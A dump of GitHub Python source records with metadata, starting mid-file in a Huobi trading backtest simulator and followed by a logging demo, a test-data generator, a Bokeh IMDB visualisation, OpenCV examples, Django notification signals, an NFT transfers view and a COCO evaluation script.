GetPosition(self):\r\n return self.position\r\n\r\n def FetchFreeAsset(self):\r\n return self.free_asset\r\n\r\n def FetchTotAsset(self):\r\n self.UpdateTotAsset()\r\n return self.tot_asset\r\n\r\n async def CheckOrderStatus(self, order_id):\r\n # TODO:判断是否购买成功\r\n pass\r\n\r\n async def Buy(self, price, quantity):\r\n price = float(price)\r\n if self.free_asset < 0:\r\n return\r\n can_buy = math.floor(float(self.free_asset) * self.level * price // self.face_value)\r\n if can_buy == 0:\r\n print(\"Can't buy 3\")\r\n return\r\n quantity = int(quantity)\r\n\r\n if (quantity > 0 and price < self.ask1_price) or (quantity < 0 and price > self.bid1_price): \r\n return\r\n\r\n if abs(quantity) > can_buy:\r\n return\r\n\r\n logger.info(\"[OP Buy]\", price, quantity)\r\n self.op_time.append(('BUY', price))\r\n asset_diya = abs(quantity) / price / self.level * self.face_value\r\n\r\n fee = abs(quantity) * 0.0004 * self.face_value / price\r\n # print('quantity:', quantity, 'fee:', fee)\r\n self.tot_fee += fee\r\n self.free_asset -= asset_diya + fee\r\n if quantity > 0:\r\n self.position.long_quantity += int(quantity)\r\n self.position.long_avg_price = price\r\n else:\r\n self.position.short_quantity += int(abs(quantity))\r\n self.position.short_avg_price = price\r\n return quantity\r\n\r\n async def Sell(self, price, quantity):\r\n if quantity == 0:\r\n return\r\n if (quantity > 0 and price > self.bid1_price) or (quantity < 0 and price < self.ask1_price): \r\n return\r\n quantity = int(quantity)\r\n\r\n self.UpdateTotAsset()\r\n add_asset = 0\r\n if quantity > 0:\r\n if self.position.long_quantity < quantity:\r\n logger.error(\"Can't be!\")\r\n return\r\n self.position.long_quantity -= quantity\r\n buy_price = self.position.long_avg_price\r\n dire = 1\r\n add_asset = (1/buy_price - 1/price) * quantity * self.face_value\r\n if self.position.long_quantity:\r\n self.position.long_avg_price = 0\r\n else:\r\n if self.position.short_quantity < int(abs(quantity)):\r\n logger.error(\"Can't be!\")\r\n return\r\n self.position.short_quantity += quantity\r\n buy_price = self.position.short_avg_price\r\n dire = -1\r\n add_asset += (1/price - 1/buy_price) * -quantity * self.face_value\r\n if self.position.short_quantity:\r\n self.position.short_avg_price = 0\r\n\r\n logger.info(\"[OP Sell]\", price, quantity)\r\n self.deal_count += 1\r\n self.op_time.append((buy_price, price, dire, add_asset))\r\n fee = abs(quantity) * 0.0004 * self.face_value / price\r\n self.tot_fee += fee\r\n self.free_asset = self.tot_asset - fee\r\n return quantity\r\n\r\n def UpdateTotAsset(self):\r\n asset_recover = 0\r\n add_asset = 0\r\n price = self.ask1_price\r\n if self.position.long_quantity > 0:\r\n quantity = self.position.long_quantity\r\n buy_price = self.position.long_avg_price\r\n add_asset = (1/buy_price - 1/price) * quantity * self.face_value\r\n asset_recover = abs(quantity) / buy_price / self.level * self.face_value\r\n\r\n if self.position.short_quantity > 0:\r\n quantity = self.position.short_quantity\r\n buy_price = self.position.short_avg_price\r\n add_asset += (1/price - 1/buy_price) * quantity * self.face_value\r\n asset_recover += abs(quantity) / buy_price / self.level * self.face_value\r\n\r\n self.tot_asset = self.free_asset + asset_recover + add_asset\r\n\r\n def CalResult(self):\r\n self.UpdateTotAsset()\r\n init_array = datetime.datetime.fromtimestamp(self.init_timeline)\r\n init_time_str = init_array.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n now_array = datetime.datetime.fromtimestamp(self.now_timeline)\r\n now_time_str = now_array.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n f = 100 * (self.now_timeline - self.init_timeline) / (time.time() - self.init_timeline)\r\n\r\n print('\\nStart time: ', init_time_str, self.init_timeline)\r\n if f < 100:\r\n print('End time: ', now_array, 'rate:%.3f%%' % (f, ))\r\n print(\"left:\", self.tot_asset, 'fee:', self.tot_fee, 'deal count:', self.deal_count)\r\n save = pd.DataFrame(self.asset_list)\r\n save.to_csv(\"test.csv\")\r\n self.Draw()\r\n return\r\n\r\n def Draw(self):\r\n return\r\n\r\n async def GetRecentKLine(self, period, time_long):\r\n self.UpdateTick()\r\n last_idx = self.klines_idx[period]\r\n ret = self.klines_data[period][last_idx - time_long + 1:last_idx + 1]\r\n return ret\r\n\r\n def Search(self, li, key, find_big=True):\r\n le = 0\r\n ri = len(li) - 1\r\n while le < ri:\r\n if not find_big and (le + ri) & 1:\r\n mid = (le + ri) // 2\r\n else:\r\n mid = (le + ri) // 2\r\n\r\n if mid == key:\r\n return mid\r\n\r\n if key < li[mid]['id']:\r\n ri = mid - 1\r\n else:\r\n le = mid + 1\r\n return le\r\n\r\n async def GetKLines(self, period, from_time, to_time=None):\r\n self.UpdateTick()\r\n if self.now_timeline >= time.time():\r\n return None\r\n if to_time is None:\r\n to_time = self.now_timeline\r\n\r\n l1 = self.Search(self.klines_data[period], from_time)\r\n l2 = self.Search(self.klines_data[period], to_time, False)\r\n\r\n def time(self):\r\n return self.now_timeline\r\n", "repo_name": "yylogo/huobi_trade", "sub_path": "market/huobi_test.py", "file_name": "huobi_test.py", "file_ext": "py", "file_size_in_byte": 12996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "market.huobi.HuobiMarket", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "alpha.tasks.SingleTask.run", "line_number": 42, "usage_type": "call"}, {"api_name": "alpha.tasks.SingleTask", "line_number": 42, "usage_type": "name"}, {"api_name": "alpha.position.Position", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 72, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 84, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "six.moves.xrange", "line_number": 94, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 96, "usage_type": "call"}, {"api_name": "time.time", "line_number": 104, "usage_type": "call"}, {"api_name": "alpha.quant.quant.stop", "line_number": 106, "usage_type": "call"}, {"api_name": "alpha.quant.quant", "line_number": 106, "usage_type": "name"}, {"api_name": "strategies.IS_CLOSE", "line_number": 107, "usage_type": "attribute"}, {"api_name": "strategies.strategies", "line_number": 112, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 120, "usage_type": "call"}, {"api_name": "strategies.strategies", "line_number": 122, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 123, "usage_type": "call"}, {"api_name": "six.moves.xrange", "line_number": 127, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 132, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 163, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 163, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 192, "usage_type": "call"}, {"api_name": "alpha.utils.logger.info", "line_number": 204, "usage_type": "call"}, {"api_name": "alpha.utils.logger", "line_number": 204, "usage_type": "name"}, {"api_name": "alpha.utils.logger.error", "line_number": 231, "usage_type": "call"}, {"api_name": "alpha.utils.logger", "line_number": 231, "usage_type": "name"}, {"api_name": "alpha.utils.logger.error", "line_number": 241, "usage_type": "call"}, {"api_name": "alpha.utils.logger", "line_number": 241, "usage_type": "name"}, {"api_name": "alpha.utils.logger.info", "line_number": 250, "usage_type": "call"}, {"api_name": "alpha.utils.logger", "line_number": 250, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 278, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 278, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 280, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 280, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 288, "usage_type": "call"}, {"api_name": "time.time", "line_number": 322, "usage_type": "call"}]}
+{"seq_id": "18761424420", "text": "import logging\n#-*- coding:utf-8 –*-\nimport logging\nfrom logging.handlers import RotatingFileHandler\n#定义一个RotatingFileHandler,最多备份5个日志文件,每个日志文件最大10M\nRthandler = RotatingFileHandler('myapp.log', maxBytes=0.1*1024*1024,backupCount=5)\nRthandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nRthandler.setFormatter(formatter)\nlogging.getLogger('').addHandler(Rthandler)\n\nlogging.debug('debug 日志信息')\nlogging.info('info 日志信息')\nlogging.warning('warning 日志信息')\nlogging.error('error 日志信息') \nlogging.critical('critical 日志信息') \n", "repo_name": "iweimingliang/script", "sub_path": "python/logging/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 657, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.handlers.RotatingFileHandler", "line_number": 6, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 7, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "4028660432", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"Module for providing randoms data for web-app's entities.\"\"\"\n__author__ = 'AleksNeStu'\n__copyright__ = \"The GNU General Public License v3.0\"\n\nimport functools\nimport random\nimport string\n\nfrom constants import data, repeat\n\n\nclass RandomData(object):\n \"\"\"Class that provide random data for generate web-app objects.\"\"\"\n\n @staticmethod\n def common_part(prefix, maxlen=repeat.RANDOM_DATA):\n \"\"\"Random generator of the common parts.\"\"\"\n symbols = string.ascii_letters + string.digits + string.punctuation\n return prefix + \"\".join(\n [random.choice(symbols) for _ in range(random.randint(1, maxlen))])\n\n @staticmethod\n def email_part(domain=data.CONTACT_EMAIL_DOMAIN,\n maxlen=repeat.RANDOM_EMAIL):\n \"\"\"Random generator of the email parts.\n Example:\n dosFS@gmail.com.\n \"\"\"\n symbols = string.ascii_letters + string.digits\n return \"\".join([random.choice(symbols) for _ in\n range(random.randint(1, maxlen))]) + domain\n\n @staticmethod\n def phone(code=data.PHONE_CODE):\n \"\"\"Random generator of the phone number (default for USA: code=1)\n Example:\n +1-844-751-8951\n \"\"\"\n d = functools.partial(random.randint, 0, 9)\n phone = lambda: \"+{}-{}{}{}-{}{}{}-{}{}{}{}\".format(\n code, d(), d(), d(), d(), d(), d(), d(), d(), d(), d())\n return phone()", "repo_name": "AleksNeStu/Testing_Automation_Framework__web-app", "sub_path": "framework/generator/random_data.py", "file_name": "random_data.py", "file_ext": "py", "file_size_in_byte": 1482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "constants.repeat.RANDOM_DATA", "line_number": 18, "usage_type": "attribute"}, {"api_name": "constants.repeat", "line_number": 18, "usage_type": "name"}, {"api_name": "string.ascii_letters", "line_number": 20, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 20, "usage_type": "attribute"}, {"api_name": "string.punctuation", "line_number": 20, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "constants.data.CONTACT_EMAIL_DOMAIN", "line_number": 25, "usage_type": "attribute"}, {"api_name": "constants.data", "line_number": 25, "usage_type": "name"}, {"api_name": "constants.repeat.RANDOM_EMAIL", "line_number": 26, "usage_type": "attribute"}, {"api_name": "constants.repeat", "line_number": 26, "usage_type": "name"}, {"api_name": "string.ascii_letters", "line_number": 31, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 31, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "constants.data.PHONE_CODE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "constants.data", "line_number": 36, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 41, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "attribute"}]}
+{"seq_id": "797693188", "text": "\n# coding: utf-8\n\n# # Data visualisation Project - Visualisation 1\n\n# Now, that we have cleaned data we can use it for creating visualisations and finding interesting things from it.\n\n# Importing necessary libraries and the data set\n\n# In[4]:\n\n\nimport pandas as pd\nimport numpy as np\n\n\n# In[5]:\n\n\nfrom bokeh.plotting import figure , show\nfrom bokeh.layouts import layout, widgetbox, row\nfrom bokeh.models import ColumnDataSource, Div, HoverTool, Legend\nfrom bokeh.models.widgets import Slider, Select\nfrom bokeh.io import curdoc, output_notebook\n\n\n# In[6]:\n\n\nfrom bokeh.transform import factor_cmap\nfrom bokeh.palettes import Colorblind\n\n\n# In[5]:\n\n\n#output_notebook()\n\n\n# In[6]:\n\n\ndataset_names = pd.read_csv('I:/DCU/SEM1/Lectures/Data Management & Visualisation - CA682 Suzanne Little/project/imdb_project/cleaned data/names.csv',index_col= 'nconst')\n\n\n# In[7]:\n\n\ndataset_titles_ratings = pd.read_csv('I:/DCU/SEM1/Lectures/Data Management & Visualisation - CA682 Suzanne Little/project/imdb_project/cleaned data/titles_basic_rating.csv',index_col= 'tconst')\n\n\n# In[8]:\n\n\ndataset_titles_prin = pd.read_csv('I:/DCU/SEM1/Lectures/Data Management & Visualisation - CA682 Suzanne Little/project/imdb_project/cleaned data/titles_principle.csv',index_col= 'tconst')\n\n\n# In[295]:\n\n\n#dataset_titles_prin.head()\n\n\n# In[296]:\n\n\n#dataset_titles_ratings.head()\n\n\n# In[297]:\n\n\n#dataset_names.head()\n\n\n# In[298]:\n\n\n#dataset_titles_ratings.describe(include = 'all')\n\n\n# We want to concentrate on Comedy, Romance, Drama, Horror and Action genres for our visualisations\n\n# In[1]:\n\n\ngenres = ['Comedy','Romance', 'Drama','Horror','Action']\n\n\n# In[10]:\n\n\n#genres\n\n\n# Creating a source data for our visualisation.\n\n# In[7]:\n\n\nsource = ColumnDataSource(data=dict(x=[], y=[], genre=[], title=[], year=[]))\n\n\n# Defining the parameters for the visualisation.\n\n# In[8]:\n\n\np = figure(plot_height=650, plot_width=700, title=\"\" , toolbar_location=None, x_range=(10,100000),y_range=(0,11),x_axis_type=\"log\")\n\n\n# In[9]:\n\n\nc = p.circle(x=\"x\", y=\"y\", source=source, size=7, color=factor_cmap('genre', palette=Colorblind[5], factors=genres), legend='genre')\n\n\n# In[51]:\n\n\np.add_tools(HoverTool( tooltips=[\n (\"Title\", \"@title\"),\n (\"Genre\", \"@genre\"),\n ]\n ))\np.legend.location = \"top_right\"\np.legend.orientation = \"horizontal\"\np.xaxis.axis_label_text_font_size =\"16pt\"\np.yaxis.axis_label_text_font_size= \"16pt\"\np.title.text_font_size = '20pt'\np.title.align = \"center\"\np.title.offset =10\n\n\n# In[52]:\n\n\np.xaxis.axis_label = 'Number of Votes'\np.yaxis.axis_label = 'Average Rating'\n\n\n# Defining the call back function, to be called on change of slider and drop down value\n\n# In[53]:\n\n\ndef callback(attr, old, new):\n print('inside callback')\n update(num=min_year.value,genre_sel=genre_select.value)\n\n\n# In[54]:\n\n\ngenres_sel_list = genres.append('All')\nmin_year = Slider(title=\"Year\", start=1950, end=2018, value=2015, step=1)\nmin_year.on_change('value',callback)\ngenre_select=Select(title=\"Genre\", value=\"All\", options=genres)\ngenre_select.on_change('value',callback)\n\n\n# In[55]:\n\n\ndef select_movies(num,genre_sel):\n selected = dataset_titles_ratings[\n (dataset_titles_ratings.startYear == num)\n & (dataset_titles_ratings.titleType == 'movie') & \n (dataset_titles_ratings.genre1 != '\\\\N')\n &((dataset_titles_ratings.genre1 == 'Comedy') | (dataset_titles_ratings.genre1 == 'Romance') |\n (dataset_titles_ratings.genre1 == 'Action') | (dataset_titles_ratings.genre1 == 'Horror') |\n (dataset_titles_ratings.genre1 == 'Drama'))]\n if (genre_sel != \"All\"):\n selected = selected[selected.genre1.str.contains(genre_sel)==True]\n return selected\n\n\n# In[56]:\n\n\ndef update(num,genre_sel):\n df = select_movies(num,genre_sel)\n p.title.text = str(len(df)) + \" movies selected for year \" + str(min_year.value) \n source.data = dict(\n x=df['numVotes'],\n y=df['averageRating'],\n genre=df[\"genre1\"],\n title=df.originalTitle,\n year=df[\"startYear\"])\n return (source.data)\n \n\n\n# In[57]:\n\n\nsizing_mode = 'fixed'\ninputs = widgetbox(min_year,genre_select, sizing_mode=sizing_mode)\nlayout = row(p,inputs)\n\n\n# In[58]:\n\n\nnew_value = update(min_year.value,genre_select.value)\n\n\n# In[59]:\n\n\ncurdoc().add_root(layout)\ncurdoc().title = \"Movies\"\n\n\n# In[60]:\n\n\n#show(layout)\n\n", "repo_name": "guptaa3/IMDB_data_visulisation", "sub_path": "Python files/Data_visualisation_project_visual_1.py", "file_name": "Data_visualisation_project_visual_1.py", "file_ext": "py", "file_size_in_byte": 4326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 55, "usage_type": "call"}, {"api_name": "bokeh.models.ColumnDataSource", "line_number": 101, "usage_type": "call"}, {"api_name": "bokeh.plotting.figure", "line_number": 109, "usage_type": "call"}, {"api_name": "bokeh.transform.factor_cmap", "line_number": 115, "usage_type": "call"}, {"api_name": "bokeh.palettes.Colorblind", "line_number": 115, "usage_type": "name"}, {"api_name": "bokeh.models.HoverTool", "line_number": 121, "usage_type": "call"}, {"api_name": "bokeh.models.widgets.Slider", "line_number": 156, "usage_type": "call"}, {"api_name": "bokeh.models.widgets.Select", "line_number": 158, "usage_type": "call"}, {"api_name": "bokeh.layouts.widgetbox", "line_number": 198, "usage_type": "call"}, {"api_name": "bokeh.layouts.layout", "line_number": 199, "usage_type": "name"}, {"api_name": "bokeh.layouts.row", "line_number": 199, "usage_type": "call"}, {"api_name": "bokeh.layouts.layout", "line_number": 211, "usage_type": "argument"}, {"api_name": "bokeh.io.curdoc", "line_number": 211, "usage_type": "call"}, {"api_name": "bokeh.io.curdoc", "line_number": 212, "usage_type": "call"}]}
+{"seq_id": "74704017688", "text": "import numpy as np\nimport cv2\n\nprint(\"OpenCV version:\", cv2.__version__)\n\nimg = cv2.imread('/home/ahu/Workspace/py-video-processing-rsc/opencv-master/samples/data/lena.jpg', -1)\nimg2 = cv2.imread('/home/ahu/Workspace/py-video-processing-rsc/opencv-master/samples/data/logo-225-225.png', -1)\n\n# Tuple of number of rows, columns and channels\nprint(img.shape)\n\n# Total number of pixels is accessible\nprint(img.size)\n\n# Image datatype\nprint(img.dtype)\n\n# Split an image in 3 channels\nb, g, r = cv2.split(img)\n\n# Merge 3 channels in an image\nimg = cv2.merge((b, g, r))\n\n# Move a part of an image [y1:y2, x1:x2] (ROI : Region Of Interest)\neye = img[250:290, 250:290]\nimg[210:250, 290:330] = eye\ncv2.imshow('image', img)\n\n# Add 2 images\nimg = cv2.resize(img, (225, 225))\nimg2 = cv2.resize(img2, (225, 225))\ndst1 = cv2.add(img, img2)\ncv2.imshow('imageadd1', dst1)\n\n# Add 2 images with weight %1stimg %2ndimg\n# args : img1, alpha, img2, beta, gamma\n# -> img1*alpha + img2*beta + gamma\ndst2 = cv2.addWeighted(img, 0.75, img2, 0.25, 0)\ncv2.imshow('imageadd2', dst2)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n", "repo_name": "Karma-Team/py-video-processing", "sub_path": "examples/10_basic_operations_on_images.py", "file_name": "10_basic_operations_on_images.py", "file_ext": "py", "file_size_in_byte": 1095, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.__version__", "line_number": 4, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "11259385810", "text": "#! -*- coding:utf-8 -*-\nfrom django.dispatch import Signal\nfrom django.db.models.signals import post_save\nfrom django.core.signals import request_finished\nfrom groups.models import Group, Topic, Reply, Applicant\nfrom sys_notification.models import Notification\n\n# 群组操作的signal\ngroup_notify = Signal(providing_args=[\"instance\", \"args\", \"kwargs\"])\n\n# 话题操作的signal\ntopic_notify = Signal(providing_args=[\"instance\", \"args\", \"kwargs\"])\n\n# 好友操作的signal\nfriend_notify = Signal(providing_args=[\"instance\", \"args\", \"kwargs\"])\n\n# 将通知置为已点击\nset_notity_clicked = Signal(providing_args=[\"request\", \"no_type\", \"args\", \"kwargs\"])\n\n\ndef group_action(sender, instance, *args, **kwargs):\n obj = instance\n if obj.status != 'processing':\n notify = Notification(no_type='group', group_action=obj.status, to_user=obj.applicant, group=obj.group,\n applicant=obj)\n notify.save()\n\ngroup_notify.connect(group_action, dispatch_uid='create_group_notify')\n\n\ndef topic_action(sender, instance, *args, **kwargs):\n obj = instance\n if obj.reply: # 是否是对回复的回复\n notify = Notification(no_type='topic', topic_action='re_reply', to_user=obj.reply.creator, reply=obj.reply,\n topic=obj.topic, )\n notify.save()\n else:\n notify = Notification(no_type='topic', topic_action='re_topic', to_user=obj.topic.creator, topic=obj.topic)\n notify.save()\n\ntopic_notify.connect(topic_action, dispatch_uid='create_topic_notify')\n\n\ndef friend_action(sender, instance, *args, **kwargs):\n obj = instance\n # 关注操作\n notify = Notification(no_type='friend', friend_action='follow', to_user=obj.to_user, follower=obj.from_user)\n notify.save()\nfriend_notify.connect(friend_action, dispatch_uid='follow_notify')\n\n\ndef set_notification_clicked(sender, request, no_type, **kwargs):\n \"\"\"\n 点击相应页面后将通知置为已经点击clicked\n @fanlintao\n \"\"\"\n notify_qs = Notification.objects.filter(to_user=request.user, no_type=no_type, click='unclick')\n notify_qs.update(click='clicked')\n\nset_notity_clicked.connect(set_notification_clicked, dispatch_uid='set_notification_clicked')\n\n\n\n", "repo_name": "mutoulbj/BOHOO", "sub_path": "sys_notification/signals.py", "file_name": "signals.py", "file_ext": "py", "file_size_in_byte": 2235, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.dispatch.Signal", "line_number": 9, "usage_type": "call"}, {"api_name": "django.dispatch.Signal", "line_number": 12, "usage_type": "call"}, {"api_name": "django.dispatch.Signal", "line_number": 15, "usage_type": "call"}, {"api_name": "django.dispatch.Signal", "line_number": 18, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification", "line_number": 24, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification", "line_number": 34, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification", "line_number": 38, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification", "line_number": 47, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification.objects.filter", "line_number": 57, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sys_notification.models.Notification", "line_number": 57, "usage_type": "name"}]}
+{"seq_id": "14761058338", "text": "from .services import get_transfers_by_id\nfrom django.http import HttpResponse\nimport json\n\n\n# Create your views here.\n\n\ndef get_transfers(requests):\n chain = requests.GET.get(\"chain\")\n address = requests.GET.get(\"address\")\n token_id = requests.GET.get(\"token_id\")\n\n nft_transfers = get_transfers_by_id(chain=chain, address=address, token_id=token_id)\n json_transfers = json.dumps(nft_transfers)\n return HttpResponse(json_transfers)\n", "repo_name": "MoralisWeb3/youtube-tutorials", "sub_path": "get-nft-transfers-by-id/backend/nft/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 451, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 606, "dataset": "github-code", "pt": "31", "api": [{"api_name": "services.get_transfers_by_id", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "22042301831", "text": "import requests\nimport numpy as np\nfrom sklearn import linear_model\n\n## get data and trans to np\nurl = 'http://127.0.0.1:5000'\njson_data = requests.get(url).json()\ndata = np.array( [[ float(x), json_data[x]] for x in json_data ])\nprint(data)\n\n## prepare data\nfor i in range(1, len(data)):\n data[i, 0] = np.sum(data[i, 0] + data[i - 1, 0])\nprint(data)\n\n## fit data\nclf = linear_model.LinearRegression()\nclf.fit(data[:, 0].reshape(-1, 1), data[:, 1])\n\n## get coef\nprint(clf.coef_)\n", "repo_name": "kylechenoO/dblr", "sub_path": "client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "5230173141", "text": "import magic\n\nfrom infrastructure.config.config import LANGUAGE_EXTENSIONS\n\n\nasync def identify_language(file_path: str, languages: set):\n # Use python-magic to determine the file type and\n # add to languages set\n mime: magic.Magic = magic.Magic()\n file_type: str = mime.from_file(file_path)\n for language in LANGUAGE_EXTENSIONS:\n if language in file_type:\n languages.add(language)\n", "repo_name": "Lehsqa/eon_telegram_bot", "sub_path": "project/infrastructure/files/identify_language.py", "file_name": "identify_language.py", "file_ext": "py", "file_size_in_byte": 415, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "magic.Magic", "line_number": 9, "usage_type": "attribute"}, {"api_name": "infrastructure.config.config.LANGUAGE_EXTENSIONS", "line_number": 11, "usage_type": "name"}]}
+{"seq_id": "72576167447", "text": "\"\"\"Calculate Mean Average Precision on the ground truth and predictions in the COCO format.\"\"\"\n\nimport argparse\n\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\n\n\ndef print_results(coco_eval):\n coco_eval.evaluate()\n coco_eval.accumulate()\n coco_eval.summarize()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n arg = parser.add_argument\n arg(\"-p\", \"--pred_path\", type=str, help=\"Path to the ground truth json file.\", required=True)\n arg(\"-g\", \"--gt_path\", type=str, help=\"Path to the json file with predictions.\", required=True)\n\n args = parser.parse_args()\n\n coco = COCO(args.gt_path)\n\n pred_coco = coco.loadRes(args.pred_path)\n\n categories = coco.cats\n\n print(\"-------------------------------------------------------------------------------\")\n print(\"CATEGORIES:\")\n print(categories)\n\n print(\"-------------------------------------------------------------------------------\")\n\n coco_eval = COCOeval(cocoGt=coco, cocoDt=pred_coco, iouType=\"bbox\")\n\n print(\"ALL CLASSES :\")\n\n print_results(coco_eval)\n\n for value in categories.values():\n category_id = value[\"id\"]\n class_name = value[\"name\"]\n print(\"-------------------------------------------------------------------------------\")\n print(\"CLASS_NAME = \", class_name)\n\n coco_eval.params.catIds = category_id\n print_results(coco_eval)\n", "repo_name": "ternaus/iglovikov_helper_functions", "sub_path": "iglovikov_helper_functions/metrics/coco_eval.py", "file_name": "coco_eval.py", "file_ext": "py", "file_size_in_byte": 1426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 59, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "pycocotools.coco.COCO", "line_number": 23, "usage_type": "call"}, {"api_name": "pycocotools.cocoeval.COCOeval", "line_number": 35, "usage_type": "call"}]}
